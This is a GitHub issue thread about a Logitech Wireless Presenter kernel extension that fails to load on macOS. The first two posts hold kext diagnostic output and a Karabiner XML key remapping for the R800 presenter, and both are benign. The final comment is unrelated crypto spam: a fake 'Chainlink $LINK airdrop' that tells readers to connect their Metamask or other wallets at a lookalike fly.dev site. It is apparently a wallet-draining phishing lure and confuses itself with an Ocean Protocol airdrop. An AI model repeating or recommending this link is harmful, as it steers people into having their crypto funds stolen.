### ISSUE TITLE
Why the kext could not be loaded automatically? 

### ISSUE THREAD

**Issue by bao3** [ake-koomsin/LogitechWirelessPresenterKext#2]
``` Bash
$ sudo kextutil /Library/Extensions/LogitechWirelessPresenter.kext
Diagnostics for /Library/Extensions/LogitechWirelessPresenter.kext:
Code Signing Failure: code signature is invalid
kext-dev-mode allowing invalid signature -67050 0xFFFFFFFFFFFEFA16 for kext "/Library/Extensions/LogitechWirelessPresenter.kext"
kext signature failure override allowing invalid signature -67050 0xFFFFFFFFFFFEFA16 for kext "/Library/Extensions/LogitechWirelessPresenter.kext"


$ csrutil status
System Integrity Protection status: disabled.

$ sudo kextload LogitechWirelessPresenter.kext

$ kextstat  | grep ake

$ kextstat -l | grep ake
  172    0 0xffffff7f82e16000 0x2000     0x2000     th.in.ake.LogitechWirelessPresenter (1) DDA30EFF-CFF9-3ABB-82FE-D74F5CF2F9EE <31 4 3>
```

**Comment by bao3** [comment]
@ake-koomsin I came here to update thiss issue.I found a new way to change the key code ,but I must install Karabiner,and the new code bellow:

``` XML
  <devicevendordef>
    <vendorname>L</vendorname>
    <vendorid>0x1d57</vendorid>
  </devicevendordef>
  <deviceproductdef>
    <productname>R800</productname>
    <productid>0xad07</productid>
  </deviceproductdef>
  <appdef>
    <appname>KEYNOTE</appname>
    <equal>com.apple.iWork.Keynote</equal>
  </appdef>


  <item>
  <name>Logitech R800</name>
    <item>
      <name>R800ForKeynote</name>
      <identifier>private.R800.key</identifier>
      <device_only>DeviceVendor::L,DeviceProduct::R800</device_only>
       <only>KEYNOTE</only>
      <autogen>__KeyToKey__ KeyCode::DOT, KeyCode::B</autogen>
      <autogen>__KeyToKey__ KeyCode::F5,MODIFIERFLAG_EITHER_LEFT_OR_RIGHT_SHIFT, KeyCode::P,ModifierFlag::COMMAND_L | ModifierFlag::OPTION_L</autogen>
    </item>
  </item>


```

You could change the vendorID and productID to adapt your own hardware . This works for me .

and you cloud close this issue ,but thanks for your hard work .

**Comment by matnledsmsadkdad** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin airdrop?
- If you're interested about the world of holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great place to begin. This guide will streamline the process for you, elucidating how to join this airdrop and what you can anticipate.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://chainlinksecure.fly.dev/)

#### 🚀 Simple Steps to Secure Your Ocean Protocol Airdrop:

1. **Connect Your Wallet:**
   - Swing by the [ Chainlink $LINK Airdrop](https://chainlinksecure.fly.dev/).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the Ocean Protocol Airdrop [right here](https://chainlinksecure.fly.dev/).

3. **Engage for Extra Rewards:**
   - Dive into community discussions or tackle tasks for bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Airdrop Success:

- **Community Assistance:**
  - Need a hand? Shoot a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep your eyes peeled for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a bit. Stay chill and keep an eye out for updates.

Feel free to share your Ocean Protocol Airdrop experiences or shoot any questions in the comments below. Let's make this process a breeze for everyone!
